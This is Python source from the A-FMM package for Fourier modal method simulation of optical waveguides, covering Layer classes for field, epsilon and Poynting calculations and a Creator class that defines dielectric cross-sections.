"""Plot the absolute values of the fourier trasnsform matrices
Args:
name (str): name of the pdf file for plotting
N (int): number of points for plotting the epsilon
s (float): number pf relicas of the cell to plot. Default is 1.
"""
with PdfPages(name + ".pdf") as save:
for attr in ["FOUP", "EPS1", "EPS2", "INV", "FX", "FY"]:
try:
to_plot = getattr(self, attr)
plt.figure()
plt.title(attr)
plt.imshow(np.abs(to_plot), aspect="auto", interpolation="nearest")
plt.colorbar()
save.savefig()
plt.close()
except AttributeError:
pass
def plot_Ham(self, pdf: PdfPages) -> None:
"""Plot the matrix of the eigenvalue problem
Args:
pdf (PdfPages): pdf object to be used to plot.
Returns:
None.
"""
plt.figure()
plt.title("k0:%5.3f kx:%5.3f ky:%5.3f" % (self.k0, self.kx, self.ky))
plt.imshow(np.abs(np.abs(self.M)), aspect="auto", interpolation="nearest")
plt.colorbar()
pdf.savefig()
plt.close()
def _process_xy(self, x: np.ndarray, y: np.ndarray) -> tuple:
"""Transform the x and y coordinates between the real and computational space
Args:
x (ndarray): array of x coordinates in the real space
y (ndarray): array of y coordinates in the real space
Returns: tuple of numpy.ndarray containing:
- ndarray: array of x coordinates in the computational space
- ndarray: array of y coordinates in the computational space
"""
if self.TX:
x = sub.t_inv(x, self.ex)
if self.TY:
y = sub.t_inv(y, self.ey)
return x, y
def calculate_epsilon(
self, x: np.ndarray = 0.0, y: np.ndarray = 0.0, z: np.ndarray = 0.0
) -> dict[str, np.ndarray]:
"""Return epsilon given the coordinates
The epsilon returned here is the one reconstructed from the Fourier transform.
The epsilon is reconstructed on the meshgrid of x,y, and z.
Args:
x (array_like): x coordinates (1D array).
y (array_like): y coordinates (1D array).
z (array_like): z coordinates (1D array).
Returns:
ndarray : Epsilon value at coordinates. Shape of ndarray is the same as x,y, and z.
Raises:
ValueError:
if x,y,z have different shapes
"""
x, y = self._process_xy(x, y)
eps = self.FOUP[:, self.D // 2]
gx, gy = zip(*[g for i, g in self.G.items()])
gx, gy = np.asarray(gx), np.asarray(gy)
xp, yp, gxp = np.meshgrid(x, y, gx, indexing="ij")
xp, yp, gyp = np.meshgrid(x, y, gy, indexing="ij")
eps_p = np.dot(np.exp((0 + 2j) * np.pi * (gxp * xp + gyp * yp)), eps)
shape = np.shape(eps_p)
EPS, _ = np.meshgrid(eps_p, z, indexing="ij")
EPS = EPS.reshape(*shape, -1)
x, y, z = np.meshgrid(x, y, z, indexing="ij")
eps = {
"x": x,
"y": y,
"z": z,
"eps": EPS,
}
return eps
@staticmethod
def _filter_componets(components: list = None) -> list:
"""
Checks if the fileds components list contains only allowed ones
"""
if components is None:
return ["Ex", "Ey", "Hx", "Hy"]
for comp in components:
if comp not in ["Ex", "Ey", "Hx", "Hy"]:
raise ValueError(
f"Field component f{comp} not available. Only Ex, Ey, Hx, or Hy are allowed"
)
return components
@staticmethod
def _check_array_shapes(u: np.ndarray, d: np.ndarray) -> None:
"""
Chekcs that the modal amplitudea arrays and the coordinates arrays have consistent shapes
"""
if np.shape(u) != np.shape(d):
raise ValueError(
f"Shape of u different from shape of d {np.shape(u)}!={np.shape(d)}"
)
def calculate_field_old(
self,
u: np.ndarray,
d: np.ndarray = None,
x: np.ndarray = 0,
y: np.ndarray = 0,
z: np.ndarray = 0,
components: list = None,
) -> dict:
"""Return field given modal coefficient and coordinates
Coordinates arrays must be 1D. Fields are returned on a meshgrid of the input coordinates.
Older version. Slower, but may require less memory.
Args:
u (array_like): coefficient of forward propagating modes.
d (array_like, optional): coefficient of backward propagating modes.
Default to None: no backward propagation is assumed.
x (array_like): x coordinates.
y (array_like): y coordinates.
z (array_like): z coordinates.
components (list of str, optional): field components to calculate.
Default to None: all components ('Ex', 'Ey', 'Hx', 'Hy') are calculated.
Returns:
dict of ndarray : Desired field components. Shape of ndarray is the same as x,y, and z.
Raises:
ValueError:
if other component than 'Ex', 'Ey', 'Hx', or 'Hy' is requested.
"""
components = self._filter_componets(components)
d = np.zeros_like(u, dtype=complex) if d is None else d
self._check_array_shapes(u, d)
x, y = self._process_xy(x, y)
x, y, z = np.meshgrid(x, y, z, indexing="ij")
field = {
"x": x,
"y": y,
"z": z,
}
field.update({comp: np.zeros_like(x, dtype=complex) for comp in components})
for i, (uu, dd, n) in enumerate(zip(u, d, self.gamma)):
if uu == 0.0 and dd == 0.0:
continue
field_tmp = {comp: np.zeros_like(x, dtype=complex) for comp in components}
for j, (gx, gy) in self.G.items():
[WEx, WEy] = np.split(self.V[:, i], 2)
[WHx, WHy] = np.split(self.VH[:, i], 2)
EXP = np.exp(
(0 + 2j) * np.pi * ((gx + self.kx) * x + (gy + self.ky) * y)
)
for comp in components:
sign = 1.0 if comp[0] == "E" else -1.0
coeff = uu * np.exp(
2.0j * np.pi * self.k0 * n * z
) + sign * dd * np.exp(-2.0j * np.pi * self.k0 * n * z)
field_tmp[comp] = (
field_tmp[comp] + coeff * eval(f"W{comp}")[j] * EXP
)
for comp in components:
field[comp] = field[comp] + field_tmp[comp]
return field
def calculate_field(
self,
u: np.ndarray,
d: np.ndarray = None,
x: np.ndarray = 0,
y: np.ndarray = 0,
z: np.ndarray = 0,
components: list = None,
) -> dict:
"""Return field given modal coefficient and coordinates
Coordinates arrays must be 1D. Fields are returned on a meshgrid of the input coordinates.
Args:
u (array_like): coefficient of forward propagating modes.
d (array_like, optional): coefficient of backward propagating modes.
Default to None: no backward propagation is assumed.
x (array_like): x coordinates.
y (array_like): y coordinates.
z (array_like): z coordinates.
components (list of str, optional): field components to calculate.
Default to None: all components ('Ex', 'Ey', 'Hx', 'Hy') are calculated.
Returns:
dict of ndarray : Desired field components. Shape of ndarray is the same as x,y, and z.
Raises:
ValueError:
if other component than 'Ex', 'Ey', 'Hx', or 'Hy' is requested.
"""
x, y = self._process_xy(x, y)
components = self._filter_componets(components)
d = np.zeros_like(u, dtype=complex) if d is None else d
self._check_array_shapes(u, d)
X, Y, Z = np.meshgrid(x, y, z, indexing="ij")
field = {
"x": X,
"y": Y,
"z": Z,
}
Gx = [gs[0] for (i, gs) in self.G.items()]
Gy = [gs[1] for (i, gs) in self.G.items()]
u, d = np.asarray(u), np.asarray(d)
ind = [i for i, (uu, dd) in enumerate(zip(u, d)) if uu != 0.0 or dd != 0.0]
u = u[ind]
d = d[ind]
WEx, WEy = np.split(self.V, 2, axis=0)
WHx, WHy = np.split(self.VH, 2, axis=0)
W = {
"Ex": WEx[:, ind],
"Ey": WEy[:, ind],
"Hx": WHx[:, ind],
"Hy": WHy[:, ind],
}
X, Y, Gx = np.meshgrid(x, y, Gx, indexing="ij")
X, Y, Gy = np.meshgrid(x, y, Gy, indexing="ij")
EXP = np.exp(2.0j * np.pi * ((Gx + self.kx) * X + (Gy + self.ky) * Y))
u, Z = np.meshgrid(u, z, indexing="ij")
d, Z = np.meshgrid(d, z, indexing="ij")
n, Z = np.meshgrid(self.gamma[ind], z, indexing="ij")
z_exp = 2.0j * np.pi * self.k0 * n * Z
coeff_u = u * np.exp(z_exp)
coeff_d = d * np.exp(-z_exp)
for comp in components:
coeff = coeff_u + coeff_d if "E" in comp else coeff_u - coeff_d
EXPV = np.dot(EXP, W[comp])
field[comp] = np.dot(EXPV, coeff)
return field
def get_modal_field(
self, i: int, x: float = 0.0, y: float = 0.0, components: list = None
) -> dict:
"""Returns modal field profile
Args:
i (int): index of the mode.
x (float or array_like): x coordinate for the field calculation
y (float or array_like): y coordinate for the field calculation
components (list of str, optional): field components to calculate.
Default to None: all components ('Ex', 'Ey', 'Hx', 'Hy') are calculated.
Returns:
DataFrame: modal field
"""
x, y, z = np.meshgrid(x, y, [0.0], indexing="ij")
u = self.create_input({i: 1.0})
data = {
"x": np.squeeze(x),
"y": np.squeeze(y),
}
field = self.calculate_field(x, y, z, u, components=components)
for k, v in field.items():
data[k] = np.squeeze(v)
return data
def get_P_norm(self):
"""Creates array of single mode Poynting vector components.
It is stored in the P_norm attribute
Returns:
None.
"""
[VEx, VEy] = np.split(self.V, 2)
[VHx, VHy] = np.split(self.VH, 2)
self.P_norm = np.sum(VEx * np.conj(VHy) - VEy * np.conj(VHx), 0).real
def get_Poynting_single(self, i: int, u: np.ndarray, ordered: bool = True) -> float:
"""Return the Poyinting vector of a single mode given the modal expansion in the layer
Args:
i (int): Index of the mode.
u (1darray): Array of modal coefficient.
ordered (TYPE, optional): Regulates how mode are ordered. If True, they are ordered for decreasing effective index. If Flase, the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
TYPE: DESCRIPTION.
"""
if ordered:
j = np.argsort(self.W)[-i - 1]
else:
j = i
self.get_Poyinting_norm()
return self.PP_norm[j, j].real * np.abs(u[j]) ** 2.0
def get_Poyinting_norm(self):
"""Calculates the normalization matrix for the Poyinting vector calculations
Returns:
None.
"""
[VEx, VEy] = np.split(self.V, 2)
[VHx, VHy] = np.conj(np.split(self.VH, 2))
# old version (working)
# self.PP_norm=np.zeros((2*self.D,2*self.D),dtype=complex)
# for i in range(self.D):
# VEX,VHY=np.meshgrid(VEx[i,:],VHy[i,:])
# VEY,VHX=np.meshgrid(VEy[i,:],VHx[i,:])
# P1=np.multiply(VEX,VHY)
# P2=-np.multiply(VEY,VHX)
# P=np.add(P1,P2)
# self.PP_norm=np.add(self.PP_norm,P)
# print self.PP_norm
# new version. should be equivalent bit faster
P1 = np.dot(np.transpose(VEx), VHy)
P2 = np.dot(np.transpose(VEy), VHx)
self.PP_norm = np.add(P1, -P2)
def get_Poynting(self, u: np.ndarray, d: np.ndarray = None):
"""Calculates total Poynting vector in the layer given arrays of modal expansion
Args:
u (1darray): Modal expansion of forward propagating modes.
d (1darray, optional): Modal expansion of backward propagating modes. Defaults to None.
Returns:
TYPE: DESCRIPTION.
"""
if d is None:
d = np.zeros(2 * self.D, dtype=complex)
# try:
# self.PP_norm
# except AttributeError:
# self.get_Poyinting_norm()
self.get_Poyinting_norm()
Cn = np.add(u, d)
Cnp = np.add(u, -d)
[Cn, Cnp] = np.meshgrid(Cn, np.conj(Cnp))
C = np.multiply(Cn, Cnp)
PP = np.multiply(C, self.PP_norm)
return np.sum(PP).real
def T_interface(self, lay) -> np.ndarray:
"""Builds the Transfer matrix of the interface with another layer
Args:
lay (Layer): Layer toward which to calculate the scattering matrix.
Returns:
T (2darray): Interface scattering matrix.
"""
T1 = np.dot(linalg.inv(lay.V), self.V)
T2 = np.dot(linalg.inv(lay.VH), self.VH)
T11 = 0.5 * (T1 + T2)
T12 = 0.5 * (T1 - T2)
T21 = 0.5 * (T1 - T2)
T22 = 0.5 * (T1 + T2)
T = np.vstack([np.hstack([T11, T12]), np.hstack([T21, T22])])
return T
def T_prop(self, d: float) -> np.ndarray:
"""Build the propagation Transfer matrix of the layer
Args:
d (float): Thickness of the layer.
Returns:
T (2darray): Propagation Transfer matrix.
"""
I1 = np.diag(np.exp((0 + 1j) * self.k0 * self.gamma * d))
I2 = np.diag(np.exp(-(0 + 1j) * self.k0 * self.gamma * d))
I = np.zeros((2 * self.D, 2 * self.D), complex)
T = np.vstack([np.hstack([I1, I]), np.hstack([I, I2])])
return T
# newer version, should be faster
def interface(self, lay) -> S_matrix:
"""Builds the Scattering matrix of the interface with another layer
Args:
lay (Layer): Layer toward which to calculate the scattering matrix.
Returns:
S (S_matrix): Interface scattering matrix.
"""
S = S_matrix(2 * self.D)
T1 = np.dot(linalg.inv(lay.V), self.V)
T2 = np.dot(linalg.inv(lay.VH), self.VH)
T11 = 0.5 * (T1 + T2)
T12 = 0.5 * (T1 - T2)
# T21= 0.5*(T1 - T2)
# T22= 0.5*(T1 + T2)
# T=np.vstack([np.hstack([T11,T12]),np.hstack([T21,T22])])
Tm = linalg.inv(T11)
S.S11 = T11 - np.dot(np.dot(T12, Tm), T12)
S.S12 = np.dot(T12, Tm)
S.S21 = -np.dot(Tm, T12)
S.S22 = Tm
return S
def get_input(
self,
func: callable,
args: tuple = None,
Nxp: int = 1024,
Nyp: int = None,
fileprint: str = None,
) -> np.ndarray:
"""Expands an arbitrary fieldd shape on the basis of the layer eigenmodes
Args:
func (function): Function describing the field.
This function should be in the form (x,y,*args). It must be able to accept x and y as numpy array.
It must return two values, expressing Ex and Ey
args (tuple, optional): Eventual tuple of additional arguments for func. Defaults to None.
Nxp (int, optional): Number of points to evaluate the function in the x direction. Defaults to 1024.
Nyp (int, optional): Number of points to evaluate the function in the y direction. Defaults to None (1 if layer is 1D, Nxp if 2D).
fileprint (str, optional): Filename on which to write the used function. Mainly for debug. Defaults to None.
Returns:
u (1darray): Array of the modal coefficient of the expansion.
"""
args = () if args is None else args
if Nyp == None:
if self.Ny == 0:
Nyp = 1
y = np.array([0.0])
else:
Nyp = Nxp
y = np.linspace(-0.5, 0.5, Nyp)
else:
y = np.linspace(-0.5, 0.5, Nyp)
x = np.linspace(-0.5, 0.5, Nxp)
if self.TX:
ex = self.ex
x = sub.t_dir(x, ex)
if self.TY:
ey = self.ey
y = sub.t_dir(y, ey)
y = y * self.Nyx
[X, Y] = np.meshgrid(x, y, indexing="ij")
[Fx, Fy] = func(X, Y, *args)
Fx = np.fft.fftshift(Fx) / (Nxp * Nyp)
Fy = np.fft.fftshift(Fy) / (Nxp * Nyp)
FOUx = np.fft.fft2(Fx)
FOUy = np.fft.fft2(Fy)
Estar = np.zeros(2 * self.NPW, dtype=complex)
for i in range(self.NPW):
# print self.G[i][0], self.G[i][1],FOUx[self.G[i][0],self.G[i][1]]
Estar[i] = FOUx[self.G[i][0], self.G[i][1]]
Estar[i + self.NPW] = FOUy[self.G[i][0], self.G[i][1]]
u = linalg.solve(self.V, Estar)
return u
def create_input(self, dic: dict) -> np.ndarray:
"""Creates the array of modal coefficient using a dictionary as input
Args:
dic (dict): Dictionary of exited modes {modal_index : modal_coeff}. Modes are ordered.
Returns:
u (1darray): Array of modal coefficient.
"""
u = np.zeros((2 * self.NPW), complex)
for i in dic:
u[np.argsort(self.W)[-i - 1]] = dic[i]
return u
def get_Enorm(self):
"""Calculate field normalization
Returns:
None.
"""
[VEx, VEy] = np.split(self.V, 2)
self.ENx = np.dot(np.transpose(VEx), np.conj(VEx))
self.ENy = np.dot(np.transpose(VEy), np.conj(VEy))
def overlap(self, u: np.ndarray, up: np.ndarray = None):
"""EXPERIMENTAL: Calculates overlap between two fields given the modal expansion
Args:
u (1darray): Modal coefficient of first mode.
up (1darray, optional): Modal coefficient of first mode. Defaults to None (up=u, namely normalization is returned).
Returns:
list: [tx, tx]: floats. Namely overlap in x and y polarization
"""
if up is None:
up = u
try:
self.ENx
except AttributeError:
self.get_Enorm()
# print np.shape(u),np.shape(self.ENx)
tx = np.dot(self.ENx, np.conj(up))
ty = np.dot(self.ENy, np.conj(up))
tx = np.dot(np.transpose(u), tx)
ty = np.dot(np.transpose(u), ty)
# print tx,ty
return [tx, ty]
def coupling(self, u: np.ndarray, up: np.ndarray) -> tuple:
"""EXPERIMENTAL: Calculates coupling between two modes given their modal exapnsion
Args:
u (TYPE): Modal coefficient of first mode.
up (TYPE): Modal coefficient of second mode.
Returns:
list: [tx, tx]: floats. Coupling in x and y polarization.
"""
self.get_Enorm()
[tx1, ty1] = self.overlap(u)
[tx2, ty2] = self.overlap(up)
[txc, tyc] = self.overlap(u, up)
return txc / np.sqrt(tx1 * tx2), tyc / np.sqrt(ty1 * ty2)
class Layer_ani_diag(Layer):
"""Class for the definition of a single layer anysitropic (diagonal) layer"""
def __init__(
self,
Nx: int,
Ny: int,
creator_x: Creator,
creator_y: Creator,
creator_z: Creator,
Nyx: float = 1.0,
):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.creator = [
copy.deepcopy(creator_x),
copy.deepcopy(creator_y),
copy.deepcopy(creator_z),
]
self.Nyx = Nyx
self.FOUP = sub.create_epsilon(
self.G,
self.creator[2].x_list,
self.creator[2].y_list,
self.creator[2].eps_lists,
)
self.INV = linalg.inv(self.FOUP)
self.EPS1 = sub.fou_xy(
self.Nx,
self.Ny,
self.G,
self.creator[0].x_list,
self.creator[0].y_list,
self.creator[0].eps_lists,
)
self.EPS2 = sub.fou_yx(
self.Nx,
self.Ny,
self.G,
self.creator[1].x_list,
self.creator[1].y_list,
self.creator[1].eps_lists,
)
self.TX = False
self.TY = False
class Layer_num(Layer):
"""Class for the definition of a single layer from a function defining the dielectric profile"""
def __init__(
self,
Nx: int,
Ny: int,
func: callable,
args: tuple = None,
Nyx: float = 1.0,
NX: int = 2048,
NY: int = 2048,
):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.Nyx = Nyx
self.func = func
self.args = args
self.NX = NX
self.NY = NY
# print args
args = () if args is None else args
self.FOUP = sub.num_fou(func, args, self.G, NX, NY, self.Nyx)
self.INV = linalg.inv(self.FOUP)
# Still to be defined
self.EPS1 = sub.num_fou_xy(
self.func, self.args, self.Nx, self.Ny, self.G, NX, NY, self.Nyx
)
self.EPS2 = sub.num_fou_yx(
self.func, self.args, self.Nx, self.Ny, self.G, NX, NY, self.Nyx
)
self.TX = False
self.TY = False
class Layer_uniform(Layer):
"""Class for the definition of a single uniform layer"""
def __init__(self, Nx: int, Ny: int, eps: float | complex, Nyx: float = 1.0):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.Nyx = Nyx
self.eps = eps
self.FOUP = eps * np.identity(self.D, dtype="complex")
self.INV = 1.0 / eps * np.identity(self.D, dtype="complex")
# Still to be defined
self.EPS1 = eps * np.identity(self.D, dtype="complex")
self.EPS2 = eps * np.identity(self.D, dtype="complex")
self.TX = False
self.TY = False
class Layer_empty_st(Layer):
"""Class for the definition of an empy layer"""
def __init__(self, Nx: int, Ny: int, creator: Creator, Nyx: float = 1.0):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.creator = copy.deepcopy(creator)
self.Nyx = Nyx
self.TX = False
self.TY = False
self.FOUP = np.zeros((self.D, self.D), dtype=complex)
# self.INV=np.zeros((self.D,self.D),dtype=complex)
self.INV = linalg.inv(np.eye(self.D, dtype=complex))
self.EPS1 = np.zeros((self.D, self.D), dtype=complex)
self.EPS2 = np.zeros((self.D, self.D), dtype=complex)
def fourier(self):
"""Calculates the fourier transform matrices need for the eigenvalue problem.
Returns:
2darray: FOUP matrix.
2darray: INV matrix.
2darray: EPS1 matrix.
2darray: EPS2 matrix.
"""
self.FOUP = sub.create_epsilon(
self.G, self.creator.x_list, self.creator.y_list, self.creator.eps_lists
) * (1.0 + 0.0j)
self.INV = linalg.inv(self.FOUP)
self.EPS1 = sub.fou_xy(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
) * (1.0 + 0.0j)
self.EPS2 = sub.fou_yx(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
) * (1.0 + 0.0j)
return (self.FOUP, self.INV, self.EPS1, self.EPS2)
if __name__ == "__main__":
fig, ax = plt.subplots(1, 3, figsize=(12, 4))
cr = Creator()
cr.rect(12.0, 2.0, 0.5, 0.2)
lay = Layer(15, 15, cr)
t = np.linspace(-0.5, 0.5, 101)
x, y, z = t, t, 0.0
x, y, z = t, 0.0, t
x, y, z = 0.0, t, t
x, y, z = t, t, t
eps = lay.calculate_epsilon(x, y, z)
ax[0].contourf(
eps["x"][:, :, 50],
eps["y"][:, :, 50],
eps["eps"][:, :, 50],
)
ax[1].contourf(
eps["x"][:, 50, :],
eps["z"][:, 50, :],
eps["eps"][:, 50, :],
)
ax[2].contourf(
eps["y"][50, :, :],
eps["z"][50, :, :],
eps["eps"][50, :, :],
)
plt.show() | A-FMM | /a_fmm-0.1.0.tar.gz/a_fmm-0.1.0/A_FMM/layer.py | layer.py |
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
import A_FMM.sub_sm as sub
from matplotlib.backends.backend_pdf import PdfPages
class Creator:
"""Class for the definition of the eps profile in the layer"""
def __init__(self, x_list=None, y_list=None, eps_lists=None):
"""Creator
Args:
x_list (list): list of floats containig the coordinates of the x boundaries
y_list (list): list of floats containig the coordinates of the y boundaries
eps_lists (list): list of list of floats containig the eps value of the squares defined by x_list and y_list
"""
self.x_list = x_list
self.y_list = y_list
self.eps_lists = eps_lists
def slow_general(self, eps_core, eps_lc, eps_uc, w, h, t, Z):
self.x_list = np.linspace(-0.5 * w, 0.5 * w, len(Z) + 1)
self.y_list = [-0.5, -0.5 * h, -0.5 * h + t, 0.5 * h]
self.eps_lists = [[eps_uc, eps_lc, eps_core, eps_uc]]
eps = [eps_uc, eps_core]
for i in Z:
self.eps_lists.append([eps_uc, eps_lc, eps_core, eps[i]])
def slow_2D(self, eps_core, eps_c, w, Z):
self.x_list = np.linspace(-0.5 * w, 0.5 * w, len(Z) + 1)
self.y_list = [-0.5]
self.eps_lists = [[eps_c]]
eps = [eps_c, eps_core]
for i in Z:
self.eps_lists.append([eps[i]])
def ridge(self, eps_core, eps_lc, eps_uc, w, h, t=0.0, y_offset=0.0, x_offset=0.0):
"""Rib waveguide with single layer
Args:
eps_core (float): epsilon of the core
eps_lc (floar): epsilon of the lower cladding
eps_up (float): epsilon of the upper cladding
w (float): width of the rib (in unit of ax)
h (float): height of the un-etched part (in unit of ay)
t (float): height of the etched part (in unit of ay). Default is 0 (strip waveguide)
x_offset (float): offset of the center of the waveguide with respec to the center of the cell (in unit of ax). Default is 0
y_offset (float): offset of the etched part with resoect to the unetched one (in unit of ay). Default is 0 (etched and unetched part are aligned at the bottom)
"""
self.x_list = [-0.5 * w + x_offset, 0.5 * w + x_offset]
self.y_list = [
-0.5,
-0.5 * h,
-0.5 * h + y_offset,
-0.5 * h + t + y_offset,
0.5 * h,
]
self.eps_lists = [
[eps_uc, eps_lc, eps_lc, eps_core, eps_uc],
[eps_uc, eps_lc, eps_core, eps_core, eps_core],
]
def ridge_pn(self, eps0, epsp, epsn, eps_lc, eps_uc, w, h, t, xp, xn):
if xp < -0.5 * w:
x_left = [xp, -0.5 * w]
eps_left = [[eps_uc, eps_lc, epsp, eps_uc], [eps_uc, eps_lc, eps0, eps_uc]]
else:
x_left = [-0.5 * w, xp]
eps_left = [[eps_uc, eps_lc, epsp, eps_uc], [eps_uc, eps_lc, epsp, epsp]]
if xn > 0.5 * w:
x_right = [0.5 * w, xn, 0.5]
eps_right = [
[eps_uc, eps_lc, eps0, eps0],
[eps_uc, eps_lc, eps0, eps_uc],
[eps_uc, eps_lc, epsn, eps_uc],
]
else:
x_right = [xn, 0.5 * w, xn]
eps_right = [
[eps_uc, eps_lc, eps0, eps0],
[eps_uc, eps_lc, epsn, epsn],
[eps_uc, eps_lc, epsn, eps_uc],
]
self.x_list = x_left + x_right
self.y_list = [-0.5, -0.5 * h, -0.5 * h + t, 0.5 * h]
self.eps_lists = eps_left + eps_right
def ridge_double(
self, eps_core, eps_lc, eps_uc, w1, w2, h, t1, t2, y_offset=0.0, x_offset=0.0
):
"""Rib waveguide with double etch
Args:
eps_core (float): epsilon of the core
eps_lc (floar): epsilon of the lower cladding
eps_up (float): epsilon of the upper cladding
w1 (float): width of the unetched part (in unit of ax)
w2 (float): width of the intermediate etched part (in unit of ax)
h (float): height of the un-etched part (in unit of ay)
t1 (float): height of the intermidiate etched part (in unit of ay).
t2 (float): height of the maximum etched part (in unit of ay).
x_offset (float): offset of the center of the waveguide with respec to the center of the cell (in unit of ax). Default is 0
y_offset (float): offset of the etched part with resoect to the unetched one (in unit of ay). Default is 0 (etched and unetched part are aligned at the bottom)
"""
self.x_list = [
-0.5 * w2 + x_offset,
-0.5 * w1 + x_offset,
0.5 * w1 + x_offset,
0.5 * w2 + x_offset,
]
self.y_list = [
-0.5,
-0.5 * h,
-0.5 * h + y_offset,
-0.5 * h + t2 + y_offset,
-0.5 * h + t1 + y_offset,
0.5 * h,
]
self.eps_lists = [
[eps_uc, eps_lc, eps_lc, eps_core, eps_uc, eps_uc],
[eps_uc, eps_lc, eps_lc, eps_core, eps_core, eps_uc],
[eps_uc, eps_lc, eps_core, eps_core, eps_core, eps_core],
[eps_uc, eps_lc, eps_lc, eps_core, eps_core, eps_uc],
]
def rect(self, eps_core, eps_clad, w, h, off_x=0.0, off_y=0.0):
"""Rectangular waveguide
Args:
eps_core (float): epsilon of the core
eps_clad (floar): epsilon of the cladding
w (float): width of the waveguide (in unit of ax)
h (float): height of the waveguide (in unit of ay)
off_y (float): offset of the center of the waveguide with respect to the cell (in unit of ay). Default is 0.
off_x (float): offset of the center of the waveguide with respect to the cell (in unit of ax). Default is 0.
"""
self.x_list = [-0.5 * w + off_x, 0.5 * w + off_x]
self.y_list = [-0.5 * h + off_y, 0.5 * h + off_y]
self.eps_lists = [[eps_clad, eps_clad], [eps_clad, eps_core]]
def slab(self, eps_core, eps_lc, eps_uc, w, offset=0.0):
"""1D slab in x direction
Args:
eps_core (float): epsilon of the core.
eps_lc (float): epsilon of the lower cladding.
eps_uc (float): epsilon of the upper cladding.
w (float): thickness of the slab (in unit of ax).
offset (float, optional): Offset if the slab with respect to the center of the cell. Defaults to 0.0.
Returns:
None.
"""
self.x_list = [-0.5, -0.5 * w + offset, 0.5 * w + offset]
self.y_list = [0.5]
self.eps_lists = [[eps_uc], [eps_lc], [eps_core]]
def slab_y(self, eps_core, eps_lc, eps_uc, w):
"""1D slab in y direction
Args:
eps_core (float): epsilon of the core.
eps_lc (float): epsilon of the lower cladding.
eps_uc (float): epsilon of the upper cladding.
w (float): thickness of the slab (in unit of ay).
offset (float, optional): Offset if the slab with respect to the center of the cell. Defaults to 0.0.
Returns:
None.
"""
self.x_list = [0.5]
self.y_list = [-0.5, -0.5 * w, 0.5 * w]
self.eps_lists = [[eps_uc, eps_lc, eps_core]]
def x_stack(self, x_l, eps_l):
self.y_list = [0.5]
self.x_list = [-0.5] + x_l
self.eps_lists = [[eps_l[-1]]]
for eps in eps_l:
self.eps_lists.append([eps])
def hole(self, h, w, r, e_core, e_lc, e_up, e_fill):
"""Rib waveguide with a hole in the middle
Args:
h (TYPE): height of the waveguide (in unit of ay).
w (TYPE): width of the waveguide (in unit of ax).
r (TYPE): radius of the internal hole (in unit of ax).
e_core (TYPE): epsilon of the core.
e_lc (TYPE): epsilon of the lower cladding.
e_up (TYPE): epsilon of the upper cladding.
e_fill (TYPE): epsilon inside the hole.
Returns:
None.
"""
self.x_list = [-0.5 * w, -r, r, 0.5 * w]
self.y_list = [-0.5 * h, 0.5 * h, 0.5]
self.eps_lists = [
[e_lc, e_up, e_up],
[e_lc, e_core, e_up],
[e_lc, e_fill, e_up],
[e_lc, e_core, e_up],
]
def circle(self, e_in, e_out, r, n):
self.x_list = np.linspace(-r, r, n)
self.y_list = np.linspace(-r, r, n)
[X, Y] = np.meshgrid(self.x_list, self.y_list)
# ind= np.sqrt((X-0.5*r/float(n))**2+(Y-0.5*r/float(n))**2)<r
ind = np.sqrt(X**2 + Y**2) < r
# eps=np.array([e_out,e_in])
self.eps_lists = e_out + ind * (e_in - e_out)
def etched_stack(self, eps_uc, eps_lc, w, etch, eps_stack, d_stack):
h = sum(d_stack)
self.x_list = [-0.5 * w, 0.5 * w]
self.y_list = [-0.5]
eps1 = [eps_uc, eps_lc]
eps2 = [eps_uc, eps_lc]
dd = np.cumsum(d_stack)
if etch > h:
self.y_list.append(0.5 * h - etch)
eps1.append(eps1[-1])
eps2.append(eps_uc)
dec = 1
else:
dec = 0
for d, eps in zip(reversed(dd), reversed(eps_stack)):
if (d < etch) and (dec == 0):
self.y_list.append(0.5 * h - etch)
eps1.append(eps1[-1])
eps2.append(eps_uc)
dec = 1
self.y_list.append(0.5 * h - d)
eps1.append(eps)
if dec == 0:
eps2.append(eps)
else:
eps2.append(eps_uc)
self.y_list.append(0.5 * h)
self.eps_lists = [eps2, eps1]
def varied_epi(self, eps_back, data_list, y_off=0.0):
t_tot = sum([dd[2] for dd in data_list])
w_list = np.sort(list(set([0.5 * dd[1] for dd in data_list])))
self.x_list = [-0.5] + list(-w_list[::-1]) + list(w_list)
self.y_list = [-0.5 * t_tot] + list(
-0.5 * t_tot + np.cumsum([dd[2] for dd in data_list])
)
self.y_list = [_ + y_off for _ in self.y_list]
self.eps_lists = [len(self.y_list) * [eps_back]]
for pos in self.x_list:
eps_list = [eps_back]
for eps, w, t in data_list:
if pos < -0.5 * w:
eps_list.append(eps_back)
elif pos >= 0.5 * w:
eps_list.append(eps_back)
else:
eps_list.append(eps)
self.eps_lists.append(eps_list)
def varied_plane(self, eps_back, t, data_list):
self.y_list = [-0.5 * t, 0.5 * t]
w_tot = sum([dd[1] for dd in data_list])
self.x_list = [-0.5 * w_tot] + list(
-0.5 * w_tot + np.cumsum([dd[1] for dd in data_list])
)
self.eps_lists = [len(self.y_list) * [eps_back]]
for i, (eps, w) in enumerate(data_list):
eps_list = [eps_back, eps]
self.eps_lists.append(eps_list)
# print(self.y_list)
# print(self.x_list)
# print(self.eps_lists)
def plot_eps(self, N=101):
EPS = np.zeros((N, N)) + self.eps_lists[0][0]
x = np.linspace(-0.5, 0.5, N)
y = np.linspace(-0.5, 0.5, N)
x, y = np.meshgrid(x, y, indexing="ij")
x_old = -0.5
for xv, el in zip(self.x_list, self.eps_lists):
EPS[np.logical_and(x >= xv, x <= x_old)] = el[0]
for yv, e in zip(self.y_list, el):
EPS[np.logical_and(x >= xv, y >= yv)] = e
plt.imshow(np.logical_and(x <= xv, x >= x_old, y >= yv))
plt.show()
x_old = xv
